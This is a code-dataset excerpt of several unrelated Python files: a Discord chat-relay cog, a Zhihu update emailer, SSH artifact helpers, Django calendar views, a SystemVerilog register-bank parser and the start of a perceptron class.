]\r\n\r\n joinee = [\r\n f'`{data[\"time\"]}` **{data[\"player\"]}** `{data[\"msg\"]}`'\r\n for data in data_l\r\n ]\r\n if len(joinee):\r\n for guild_id in guild_queue:\r\n try:\r\n guild = self.bot.get_guild(guild_id)\r\n channel = guild.get_channel(int(config[guild_id][\"channel\"]))\r\n await channel.send(\"\\n\".join(joinee))\r\n except Exception:\r\n pass\r\n\r\n def string2discordColor(self, text: str) -> str:\r\n hashed = str(\r\n int(hashlib.sha1(text.encode(\"utf-8\")).hexdigest(), 16) % (10 ** 9)\r\n )\r\n r = int(hashed[:3]) % 255\r\n g = int(hashed[3:6]) % 255\r\n b = int(hashed[6:]) % 255\r\n\r\n return discord.Color.from_rgb(r, g, b)\r\n\r\n def in_cached(self, text: str) -> bool:\r\n if text in self._cached_messages:\r\n return True\r\n else:\r\n self._cached_messages.append(text)\r\n if len(self._cached_messages) >= 30:\r\n self._cached_messages = self._cached_messages[\r\n (30 - len(self._cached_messages)) :\r\n ]\r\n return False\r\n\r\n @commands.group(name=\"twbnschat\")\r\n @commands.admin_or_permissions(manage_guild=True)\r\n async def twbnschat(self, ctx):\r\n \"\"\"settings for twbnschat\"\"\"\r\n await ctx.trigger_typing()\r\n if ctx.invoked_subcommand is None:\r\n guild: discord.Guild = ctx.guild\r\n config = await self.config.guild(guild).all()\r\n\r\n embed = discord.Embed(\r\n color=await ctx.embed_color(), title=\"TwB&S F8 chat settings\"\r\n )\r\n embed.add_field(name=\"Enabled\", value=config[\"toggle\"])\r\n\r\n channel = (\r\n ctx.guild.get_channel(config[\"channel\"]).mention\r\n if ctx.guild.get_channel(config[\"channel\"])\r\n else \"None\"\r\n )\r\n\r\n embed.add_field(\r\n name=\"Channel\",\r\n value=channel,\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @twbnschat.command(name=\"channel\")\r\n async def channel(\r\n self, ctx: commands.Context, channel: Optional[discord.TextChannel] = None\r\n ):\r\n \"\"\"sets the channel to receive driver updates\r\n\r\n Usage: [p]twbnschat channel <#channl_mention>\r\n leave blank to unset\r\n \"\"\"\r\n await self.config.guild(ctx.guild).channel.set(\r\n None if channel is None else channel.id\r\n )\r\n if channel is None:\r\n await self.enabled(ctx, False)\r\n await ctx.send(\r\n f\"Channel for twbnschat has been {'unset' if channel is None else f'set at {channel.mention}'}.\"\r\n )\r\n\r\n @twbnschat.command(name=\"enabled\")\r\n async def enabled(self, ctx: commands.Context, on_off: bool):\r\n \"\"\"enables the channel for receiving\r\n\r\n Usage: [p]twbnschat enabled [on_off]\r\n \"\"\"\r\n guild: discord.Guild = ctx.guild\r\n\r\n await self.config.guild(guild).toggle.set(on_off)\r\n\r\n if on_off and await self.config.guild(guild).channel() == None:\r\n await self.config.guild(guild).channel.set(ctx.channel.id)\r\n await ctx.send(\r\n f\"Channel for twbnschat has been set to {ctx.channel.mention}.\"\r\n )\r\n\r\n await ctx.send(f\"Twbnschat has been {'enabled' if on_off else f'disabled'}.\")\r\n\r\n @twbnschat.command(name=\"alive\")\r\n @commands.is_owner()\r\n async def alive(self, ctx: commands.Context):\r\n \"\"\"(debug) function to check driver status\"\"\"\r\n try:\r\n self.driver.execute(Command.STATUS)\r\n await ctx.send(\"Driver is alive.\")\r\n except Exception as err:\r\n await ctx.send(f\"Driver is dead. Reason {err}\")\r\n\r\n @twbnschat.command(name=\"refresh\")\r\n @commands.is_owner()\r\n async def refresh(self, ctx: commands.Context):\r\n \"\"\"refreshes selenium connection\"\"\"\r\n await self.bot.wait_until_red_ready()\r\n await ctx.send(\"Stopping twbnschat...\")\r\n await self.stop(ctx)\r\n await asyncio.sleep(5)\r\n await self.start(ctx)\r\n await ctx.send(\"Done.\")\r\n\r\n @twbnschat.command(name=\"stop\")\r\n @commands.is_owner()\r\n async def stop(self, ctx: commands.Context):\r\n \"\"\"stops selenium and executed loop\"\"\"\r\n self._enabled = False\r\n if self._sync:\r\n self._sync.cancel()\r\n try:\r\n self.driver.delete_all_cookies()\r\n self.driver.close()\r\n self.driver.quit()\r\n except Exception:\r\n pass\r\n await ctx.send(content=\"Twbnschat stopped.\")\r\n\r\n @twbnschat.command(name=\"start\")\r\n @commands.is_owner()\r\n async def start(self, ctx: commands.Context):\r\n \"\"\"initialize selenium for chat fetching\"\"\"\r\n # await self.config\r\n if self.driver is None:\r\n await ctx.send(\"Initilizing selenium driver...\")\r\n self.bot.loop.create_task(self.initialize())\r\n else:\r\n await ctx.send(f\"Driver is already running\")\r\n await asyncio.sleep(4)\r\n await self.alive(ctx)\r\n\r\n @twbnschat.command(name=\"status\")\r\n async def status(self, ctx: commands.Context):\r\n \"\"\"shows the last obtained status from site\"\"\"\r\n emb = discord.Embed(description=\"Last Reported\")\r\n emb.add_field(name=\"accountA\", value=await self.config.accountA())\r\n emb.add_field(name=\"accountB\", value=await self.config.accountB())\r\n\r\n await ctx.send(embed=emb)\r\n\r\n async def test_send(self, text: str):\r\n g = self.bot.get_guild(247820107760402434)\r\n c = g.get_channel(879630016856596521)\r\n await c.send(content=text)\r\n","sub_path":"twbnschat/twbnschat.py","file_name":"twbnschat.py","file_ext":"py","file_size_in_byte":12077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420925055","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nimport time\nimport datetime\ndef getLatestMessage(browser):\n try:\n element = WebDriverWait(browser,10).until(EC.presence_of_element_located((By.CSS_SELECTOR,'.ListShortcut')))\n except:\n print('ERROR')\n messages = browser.find_element_by_css_selector('.ListShortcut').find_elements_by_class_name('List-item')\n message = messages[0]\n t = message.find_element_by_class_name('ActivityItem-meta').find_elements_by_tag_name('span')[1].text\n option = message.find_element_by_class_name('ActivityItem-meta').find_elements_by_tag_name('span')[0].text\n title = message.find_element_by_class_name('ContentItem-title').text\n print(t)\n print(option+\":\"+title)\n content = option+\":\"+title\n return t,content\n\ndef sendMail(content):\n mail_host = 'smtp.xxx.com'\n mail_user = 'xxx@xxx.com'\n mail_pass = '**********'\n\n sender = 'xxx@xxx.com'\n receivers = ['xxx@xxx.com']\n message = MIMEText(content,'plain','utf-8')\n\n message['From'] = sender\n message['To'] = receivers[0]\n subject = '知乎动态更新!'\n message['Subject'] = Header(subject,'utf-8')\n try:\n smtpObj = smtplib.SMTP()\n smtpObj.connect(mail_host,25)\n smtpObj.login(mail_user,mail_pass)\n smtpObj.sendmail(sender,receivers,message.as_string())\n print('邮件发送成功')\n except Exception as E:\n print(E)\nif __name__ == '__main__':\n uid = 'xxx'\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n # options.add_argument('--no-sandbox')\n # options.add_argument('--disable-gpu')\n browser = webdriver.Chrome(options=options)\n browser.get(\"https://www.zhihu.com/people/\"+uid)\n history = ''\n while(True):\n t, content = getLatestMessage(browser)\n if content != history:\n sendMail(t+' '+content)\n history = content\n now = datetime.datetime.now().hour\n if(now < 8):\n time.sleep((8-now)*60*60)\n else:\n time.sleep(2*60*60)\n browser.refresh()\n\n","sub_path":"notice.py","file_name":"notice.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"388593271","text":"#! /usr/bin/env python3\n\n\"\"\"\nThis file contains utility functions for scripts responsible for pushing\nand pulling build artifacts.\n\"\"\"\n__author__ = \"Jakub Kudzia\"\n__copyright__ = \"Copyright (C) 2016 ACK CYFRONET AGH\"\n__license__ = \"This software is released under the MIT license cited in \" \\\n \"LICENSE.txt\"\n\nimport os\nimport time\nimport paramiko\n\n\nARTIFACTS_DIR = 'artifacts'\nARTIFACTS_EXT = '.tar.gz'\nPARTIAL_EXT = '.partial'\nDEVELOP_BRANCH = 'develop'\n\n\ndef artifact_path(plan: str, branch: str) -> str:\n \"\"\"\n Returns path to artifact for specific plan and branch. Path is relative\n to user's home directory on repository machine.\n :param plan: name of current bamboo plan\n :param branch: name of current git branch\n \"\"\"\n return os.path.join(ARTIFACTS_DIR, plan, branch + ARTIFACTS_EXT)\n\n\ndef delete_file(ssh: paramiko.SSHClient, file_name: str) -> None:\n \"\"\"\n Delete file named file_name via ssh.\n :param ssh: sshclient with opened connection\n :param file_name: name of file to be unlocked\n \"\"\"\n\n ssh.exec_command(\"rm -rf {}\".format(file_name))\n\n\ndef partial_extension() -> str:\n return \"{partial}.{timestamp}\".format(\n partial=PARTIAL_EXT,\n timestamp=time.time()\n )\n","sub_path":"artifacts/artifact_utils.py","file_name":"artifact_utils.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428432053","text":"from django.shortcuts import render, redirect, render_to_response, RequestContext, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django import http\nfrom django.http import HttpResponse\nfrom django.utils import timezone\nimport json\nimport datetime\n\nimport dateutil.parser\nfrom utils.func import *\n\nfrom .models import Event\nfrom core.models import StudyGroup\n\n\n########################\n# Calendar\n########################\n\n@login_required\ndef view_calendar(request, study_group_id=None):\n #form = EventForm(data=request.POST or None, user=request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n template = 'event/view_calendar.html'\n\n return render(request, template, {'study_group': study_group, })\n\n########################\n# Event\n########################\n\n@login_required\ndef create_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n title = request.POST.get('title')\n start_timestamp = request.POST.get('start')\n end_timestamp = request.POST.get('end')\n allDay = request.POST.get('allDay')\n assigned_list = request.POST.get('assigned_list')\n\n assigned_list = assigned_list.split(',')\n\n if allDay is 'true':\n allDay = True\n else:\n allDay = False\n\n start = dateutil.parser.parse(start_timestamp)\n end = dateutil.parser.parse(end_timestamp)\n\n event = Event(name=title, details='', start=start, end=end, creator=current_student, study_group=study_group)\n event.save()\n\n for email in assigned_list:\n student = Student.objects.get(user__username=email)\n event.assigned_to.add(student)\n\n event.save()\n\n study_group.event_set.add(event)\n\n #movie_json = {}\n #html = t.render(Context(context))\n\n #movie_json['source'] = html\n\n #results = []\n #results.append(movie_json)\n\n #data = json.dumps(results)\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef create_event_view(request):\n form = EventForm(data=request.POST or None, user=request.user)\n template = 'core/create_event.html'\n\n return render(request, template, {'form': form, })\n\n########################\n# Finish event\n########################\n\n@login_required\ndef finish_event_as_json(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n\n if current_student in event.finished_student.all():\n event.finished_student.add(current_student)\n data = \"success\"\n else:\n data = \"fail: already finished\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef unfinish_event_as_json(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n\n if current_student in event.finished_student.all():\n event.finished_student.add(current_student)\n data = \"success\"\n else:\n data = \"fail: not finished\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Finish event\n########################\n\n@login_required\ndef finish_event(request, study_group_id=None, event_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n event = Event.objects.get(id=event_id)\n\n if current_student not in event.finished_student.all():\n event.finished_student.add(current_student)\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef unfinish_event(request, study_group_id=None, event_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n event = Event.objects.get(id=event_id)\n\n if current_student in event.finished_student.all():\n event.finished_student.remove(current_student)\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n########################\n# Edit event\n########################\n\n@login_required\ndef edit_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n #study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n dayDelta = int(request.POST.get('dayDelta'))\n minuteDelta = int(request.POST.get('minuteDelta'))\n\n event = Event.objects.get(id=id)\n\n event.start = event.start + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n event.end = event.end + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n\n event.save()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Complete event\n########################\n\n@login_required\ndef complete_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n dayDelta = int(request.POST.get('dayDelta'))\n minuteDelta = int(request.POST.get('minuteDelta'))\n\n event = Event.objects.get(id=id)\n\n event.start = event.start + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n event.end = event.end + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n\n event.save()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Delete event\n########################\n\n@login_required\ndef delete_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n #study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n event.delete()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Calendar\n########################\n\n@login_required\ndef view_calendar(request, study_group_id=None):\n #form = EventForm(data=request.POST or None, user=request.user)\n template = 'core/view_calendar.html'\n\n return render(request, template, {})\n\n@login_required\ndef get_event_as_json(request, study_group_id=None): \n current_student = get_student_from_user(request.user)\n\n if study_group_id == '0':\n events = current_student.assigned_to.all()\n else:\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n events = study_group.event_set.all()\n\n event_list = []\n\n for event in events: \n event_start = event.start.astimezone(timezone.get_default_timezone()) \n event_end = event.end.astimezone(timezone.get_default_timezone())\n\n if event_start.hour == 0 and event_start.minute == 0: \n Allday = True \n else: \n Allday = False\n\n student_list = []\n for student in event.assigned_to.all():\n student_list.append(student.user.username)\n\n student_list = ','.join(student_list)\n\n if current_student in event.finished_student.all():\n finished = True\n else:\n finished = False\n\n event_list.append ({ \n 'id': event.id , \n 'unique_id': event.study_group.unique_id , \n 'start': event_start.strftime ( '%Y-%m- %d %H:%M:%S' ), \n 'end': event_end.strftime ( '%Y-%m- %d %H:%M:%S' ), \n 'title': event.name, \n 'allDay': Allday,\n 'student_list': student_list,\n 'finished': finished,\n })\n\n if len(event_list) == 0 : \n raise http.Http404 \n else : \n return http.HttpResponse(json.dumps(event_list), content_type = 'application/json' )\n","sub_path":"event/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552321534","text":"from SVutil import *\nimport re\n\nVERBOSE = os.environ.get('VERBOSE',0)\n\nclass EAdict(): #easy access\n def __init__(self, items):\n if type(items) == dict:\n self.dic = items \n elif type(items) == list:\n self.dic = { v:i for i,v in enumerate(items) }\n else:\n print(\"un-supported type for EAdict\")\n raise TypeError\n def __getattr__(self, n):\n return self.dic[n]\n # completer\n def __svcompleterattr__(self):\n x = set(self.dic.keys())\n return x\n def __svcompleterfmt__(self, attr, match):\n if attr in self.dic.keys():\n return f'{SVutil.ccyan}{match}{SVutil.creset}' \n else:\n return f'{match}' \n\nparamfield = EAdict([ 'name' \n , 'dim' \n , 'tp'\n , 'bw' \n , 'num' \n , 'bwstr' \n , 'dimstr'\n , 'numstr' \n , 'paramtype'\n , 'numstrlst'] )\ntypefield = EAdict([ 'name' \n , 'bw' \n , 'dim' \n , 'tp' \n , 'enumliteral'\n , 'cmts' ] )\nportfield = EAdict( [ 'direction' \n , 'name' \n , 'dim' \n , 'tp' \n , 'bw' \n , 'bwstr'\n , 'dimstr'\n , 'dimstrtuple'\n , 'cmts'\n , 'group' ] )\nenumfield = EAdict( [ 'name'\n , 'bw'\n , 'dim'\n , 'tp'\n , 'enumliterals'\n , 'cmts'] )\nenumsfield = EAdict( [ 'names' \n , 'nums' \n , 'cmts'\n , 'idxs'\n , 'sizes'\n , 'name_bases'\n , 'groups'] )\nenumlfield = EAdict( [ 'name' \n , 'num' \n , 'cmt'\n , 'idx'\n , 'size'\n , 'name_base', 'group' ] )\nmacrofield = EAdict( [ 'args'\n , 'macrostr'\n , 'lambda'] )\n\nclass SVclass(SVutil):\n def __init__(self):\n self.w = 20\n self.V_(VERBOSE) \n pass\n def __getattr__(self, n):\n return self.data[self.field.dic[n]]\n @property\n def ShowData(self):\n s = ''\n for f in self.field.dic:\n try:\n s += f'{self.data[self.field.dic[f]].__repr__():<{self.w}}'\n except:\n s += f'{\"\":<{self.w}}'\n return s + '\\n'\n @property\n def ShowLine(self):\n return f'{\"\":{self.linechar}<{len(self.field.dic)*self.w}}\\n'\n @property\n def ShowField(self):\n s = ''\n for f in self.field.dic: \n s += f'{f:<{self.w}}'\n return s + '\\n'\n @property\n def Show(self):\n s = ''\n s += self.ShowField\n s += self.ShowLine\n s += self.ShowData \n return s\n def ShowDataCb(self, cblst):\n ''' \n cblst:callback list; applied to each field\n Ex: ShowDataCb([hex,bin]) would print hex(field0), bin(field1)\n '''\n s = ''\n for f, cb in zip(self.field.dic, cblst):\n _s = cb(self.data[self.field.dic[f]]) if cb else self.data[self.field.dic[f]]\n _s = _s.__repr__() if type(_s) != str else _s\n s += f'{_s:<{self.w}}'\n return s + '\\n'\n # completer\n def __svcompleterattr__(self):\n x = set(self.field.dic.keys())\n return x\n def __svcompleterfmt__(self, attr, match):\n if attr in self.field.dic.keys():\n return f'{SVutil.ccyan}{match}{SVutil.creset}' \n else:\n return f'{match}' \n \nclass SVParam(SVclass):\n field = paramfield\n def __init__(self, param=None):\n self.w = 20\n self.linechar = '='\n self.data = param\n\nclass SVStruct(SVclass):\n ''' bugged '''\n field = typefield\n def __init__(self, tp = None):\n self.w = 15\n self.linechar = '='\n self.datas = [ SVType(t) for t in tp] \n def IsAlias(self):\n pass\n @property\n def ShowData(self):\n for d in self.datas:\n d.ShowData\n \nclass SVType(SVclass):\n field = typefield\n def __init__(self, tp = None):\n self.w = 15\n self.linechar = '='\n self.data = tp\n def __repr__(self):\n type_ = type(self)\n module = type_.__module__\n qualname = type_.__qualname__\n return f\"<{module}.{qualname} {self.name} at {hex(id(self))}>\"\n @property\n def ShowData(self):\n s = ''\n for d in self.data:\n s += d.ShowData\n return s\n \nclass SVPort(SVclass):\n field = portfield\n def __init__(self, port=None):\n self.w = 20\n self.linechar = '='\n self.data = port\nclass SVEnums(SVclass):\n field = enumsfield\n def __init__(self, enums=None):\n self.w = 30\n self.linechar = '='\n self.data = enums\n #self.enumls = [ SVEnuml((name, num, cmt, idx, size, name_base)) \\\n # for name, num, cmt, idx, size, name_base in \\\n # zip( self.names, self.nums, self.cmts, self.idxs, self.sizes, self.name_bases) ]\n self.enumls = [ SVEnuml(d) for d in zip(*self.data)]\n def __str__(self):\n slst = [ str(i)+':'+x.__str__() for i,x in enumerate(self.enumls)]\n return '[ '+' , '.join(slst)+' ]'\nclass SVEnuml(SVclass):\n ''' enum literal '''\n field = enumlfield\n def __init__(self, enuml=None):\n self.w = 20\n self.linechar = '='\n self.data = enuml\n def __repr__(self):\n type_ = type(self)\n module = type_.__module__\n qualname = type_.__qualname__\n return f\"<{module}.{qualname} {self.name} at {hex(id(self))}>\"\n def __str__(self):\n return f\"\"\nclass SVRegbk(SVutil): \n '''\n Register bank information parsed from a *Regbk package\n regfields: SVEnums\n '''\n def __init__(self, pkg):\n self.customlst = [ 'regfield_suf',\n 'default_suf',\n 'bw_suf',\n 'arr_num_suf',\n 'reserved_name',\n 'regaddr_name',\n 'regaddr_arr_name',\n 'regbw_name',\n 'regaddrbw_name',\n 'regbsize_name',\n 'regbsizebw_name',\n 'regintr_name']\n self.userfunclst = ['ShowAddr']\n self.regfield_suf = '_regfield'\n self.default_suf = '_DEFAULT'\n self.bw_suf = '_BW'\n self.arr_num_suf = '_NUM'\n self.reserved_name = 'RESERVED'\n self.regaddr_name = 'regaddr'\n self.regaddr_arr_name = 'regaddr_arr'\n self.regbw_name = 'REG_BW'\n self.regaddrbw_name = 'REG_ADDR_BW'\n self.regbsize_name = 'REG_BSIZE'\n self.regbsizebw_name = 'REG_BSIZE_BW'\n self.regintr_name = 'raw_intr_stat'\n\n self.name = pkg.name\n self.verbose = V_(VERBOSE) \n self.w = 20\n self.pkg = pkg\n self.addrs = pkg.enums.get(self.regaddr_name) \n self.addrs = SVEnums(self.addrs) if self.addrs else None\n self.addrsdict = { x.name: x for x in self.addrs.enumls } if self.addrs else None\n self.regaddrs = self.addrs\n self.regaddrsdict = self.addrsdict\n self.regaddrsreversedict = {v:k for k,v in self.addrsdict.items()} if self.addrsdict else None\n self.regaddrs_arr = pkg.enums.get(self.regaddr_arr_name)\n self.regaddrs_arr = SVEnums(self.regaddrs_arr) if self.regaddrs_arr else None\n self.regaddrs_arrdict = { x.name: x for x in self.regaddrs_arr.enumls } if self.regaddrs_arr else None\n self.regbw = pkg.params.get(self.regbw_name)\n self.regaddrbw = pkg.params.get(self.regaddrbw_name)\n self.regbsize = pkg.params.get(self.regbsize_name)\n self.regbsizebw = pkg.params.get(self.regbsizebw_name)\n self.regtypes = {}\n self.regmembtypes = {}\n self.regfields = {} \n self.regslices = {}\n self.regdefaults = {}\n self.regbws = {}\n self.params = {} \n self.raw_intr_stat = self.GetType(self.regintr_name)\n for i,v in pkg.paramsdetail.items():\n _v = SVParam(v)\n self.params[i]=(_v)\n _s = i.split(self.default_suf)\n if len(_s) == 2:\n self.regdefaults[_s[0]] = _v\n _s = i.split(self.bw_suf)\n if len(_s) == 2:\n self.regbws[_s[0]] = _v\n for i,v in pkg.enums.items():\n self.EnumToRegfield(i,v)\n for i,v in pkg.types.items():\n while True:\n _v = v[0]\n subt = pkg.types.get(SVType(_v).tp)\n if len(v)==1 and subt:\n v = subt \n else:\n break\n _v = [ SVType(vv) for vv in v]\n tt = [ self.GetType(vv.tp) for vv in _v ]\n self.regtypes[i.upper()] = _v\n self.regmembtypes[i.upper()] = tt\n if self.addrsdict:\n for k in self.addrsdict.keys():\n tp = self.regtypes.get(k)\n if type(tp) == list and k not in self.regslices:\n self.StructToRegfield(k, tp)\n #self.regfields = pkg. TODO reg fields, defaults etc...\n def GetDefaultsStr(self, name, lst=False):\n reg = self.regaddrsdict.get(name)\n d = self.regdefaults.get(name)\n if not d:\n d = self.regdefaults.get(reg.name_base)\n if not d:\n return None \n if lst:\n _s = d.numstrlst\n else:\n _s = d.numstr\n return _s \n def GetBWStr(self, name, lst=False):\n reg = self.regaddrsdict.get(name)\n bw = self.regbws.get(name)\n if not bw:\n bw = self.regbws.get(reg.name_base) \n if not bw:\n return None \n try:\n if lst:\n _s = bw.numstrlst\n else:\n _s = bw.numstr\n except:\n _s = str(bw)\n return _s \n def GetType(self, tp):\n tp = self.pkg.AllType.get(tp)\n return [ SVType(t) for t in tp] if tp else None\n def EnumToRegfield(self, name, enum):\n _v = SVEnums(enum)\n _s = name.split(self.regfield_suf)\n if len(_s) == 2:\n self.regfields[_s[0]] = _v\n pre_slice = 0\n self.regslices[_s[0]] = []\n _regslices =[ (name, [(start, end-1)] ) for name, start, end in zip(_v.names, _v.nums, _v.nums[1:]+[self.regbw])] \n reserved = []\n for ii in _regslices:\n if self.reserved_name in ii[0]:\n reserved.append( ii[1][0] ) \n else:\n self.regslices[_s[0]].append(ii)\n if len(reserved)!=0:\n self.regslices[_s[0]] += [(self.reserved_name , reserved)]\n def StructToRegfield(self, name, struct):\n '''struct is list of SVType'''\n regfield = SVEnums([[] for i in enumsfield.dic])\n regslice = []\n rev = [i for i in struct]\n rev.reverse()\n num = 0\n for i in rev:\n regfield.cmts.append(i.cmts)\n regfield.nums += [num]\n regfield.names += [f'{name}_{i.name}'.upper()]\n regslice += [(i.name.upper(), [(num, num+i.bw-1)])]\n num += i.bw\n if num < self.regbw-1:\n regfield.nums += [num]\n regfield.names += [f'{name.upper()}_RESERVED']\n regslice += [('RESERVED', [(num, self.regbw-1)])]\n regfield.cmts.append(['']) \n self.regslices[name] = regslice \n import itertools \n regfield.enumls = [ SVEnuml(d) for d in itertools.zip_longest(*regfield.data)]\n self.regfields[name] = regfield\n self.regbws[name] = num \n def GetAddrCmt(self, reg):\n cmt = self.addrsdict[reg].cmt \n return self.GetCmt(cmt)\n def GetCmt(self, cmt):\n width = ''\n rw = ''\n arr= ''\n omit = ''\n comb = ''\n _ = ''\n for c in cmt:\n if type(c) != str:\n continue\n if re.search(r'RW|R/W|RO|WO|RC|W1C',c):\n rw= c.lstrip().rstrip()\n continue\n if re.search(r\"\\d\",c):\n width = c.lstrip().rstrip()\n continue\n if re.search(r\"arr|ARR\", c):\n arr = c.lstrip().rstrip()\n continue\n if re.search(r\"omit|OMIT\", c):\n omit = c.lstrip().rstrip()\n continue\n if re.search(r\"comb|COMB\", c):\n comb = c.lstrip().rstrip()\n continue\n return width, rw, arr , omit, comb, _ \n \n def GetAddrNField(self, reg):\n '''\n Return the address and regfield given the register name\n the address is multiplied by regaddrbw\n '''\n #TODO multi-dimensional register\n if type(reg)==int:\n addr = reg\n else:\n addr = self.regaddrsdict[reg].num * self.regbsize\n regfield = self.regfields.get(reg)\n nums = regfield.nums if regfield else [0]\n names = regfield.names if regfield else None\n return addr, nums, names \n def GetAddr(self, reg):\n if type(reg) == int:\n addr = reg\n elif type(reg) == tuple:\n addr = self.GetAddrNField(reg[0])[0] \n offset = reg[1] * self.regbsize\n addr += offset \n elif type(reg) == str:\n addr = self.GetAddrNField(reg)[0]\n else:\n raise TypeError('un-recognized register sequence type')\n return addr \n def RegWrite(self, reg, datalst):\n '''\n Return the address ,packed data and register fields names given register name\n and list of data of each register fields.\n '''\n addr, regnums, regnames = self.GetAddrNField(reg)\n data = self.RegfieldPack(regnums, datalst)\n return addr, data, regnames\n def RegRead(self, reg, data):\n '''\n Return the address ,extracted data fields and register fields names given register name\n and read data.\n '''\n addr, regnums, regnames = self.GetAddrNField(reg)\n datalst = self.RegfieldExtract(regnums, data)\n return datalst, regnames \n def ShowAddr(self, valuecb=hex):\n print ( f'{self.pkg.name:-^{3*self.w}}')\n SVEnuml().ShowField\n SVEnuml().ShowLine\n for i in self.regaddrs.enumls:\n print(i.ShowDataCb([None, lambda x: str(x)+' '+hex(x*self.regbsize).upper(), None]))\n def ShowRegfield(self, name):\n pass\n def RegfieldPack (self, regfieldlst, datalst):\n '''\n The function packs the provided data list\n based on each fields to a data of bandwidth self.regbw.\n regfieldlst consists of a list\n Ex: [0,6,31]; the first data will be packed to data[5:0], then data[30:6] and data[31]\n this list corresponds to self.regfield['reg name'].nums\n If the last field reaches the MSB of the register, don't specify the end.\n Ex: [0,16] indicates two 16bit field on a 32b register\n '''\n data = 0\n try:\n iterator = iter(datalst)\n except TypeError:\n datalst = [datalst]\n else:\n pass\n for f, d in zip( regfieldlst, datalst):\n data = data + (d << f )\n msk = ( 1 << self.regbw) -1 \n data = data & msk\n return data\n def RegfieldExtract(self, regfieldlst, data):\n '''\n Given the regfield list and a data, extract each fields' bit slice\n Co-test with RegfieldPack by:\n datalst == g.regbk.RegfieldExtract( regfieldlst, g.regbk.RegfieldPack( regfieldlst, datalst))\n Ex:g.regbk.RegfieldExtract( [0,5,17,30,31], g.regbk.RegfieldPack( [0, 5, 17, 30, 31], [31, 1033, 2033, 0, 1]))\n '''\n datalst = []\n for s, e in zip(regfieldlst, regfieldlst[1:]+[self.regbw]):\n msk = (1 << e) -1 \n datalst.append((data & msk) >> s)\n return datalst[0] if len(datalst)==1 else datalst\n def RegfieldUnitTest(self):\n field = [ [0,5,17,30,31]\n ,[0,8,15]]\n datalst = [ [31, 1033, 2033, 0, 1]\n ,[56, 22,55]]\n err = []\n for f,d in zip(field, datalst):\n _d = self.RegfieldExtract(f, self.RegfieldPack(f, d))\n self.print(_d)\n err += [_d==d]\n return err \n \n","sub_path":"SVclass.py","file_name":"SVclass.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253159257","text":"import numpy as np\r\nimport csv\r\nimport random\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Perceptron:\r\n\r\n def __init__(self, file, learning_rate):\r\n self.dados_treinamento = {}\r\n # self.dados_teste = {}\r\n self.pesos = {}\r\n self.learning_rate = learning_rate\r\n # self.filepath = file\r\n self.leitura(file)\r\n self.iniciar_pesos()\r\n self.somar()\r\n self.testar()\r\n\r\n def sigmoid(self, soma):\r\n resultado = (1 / (1 + np.exp(-soma)))\r\n\r\n if resultado >= 1.0:\r\n return 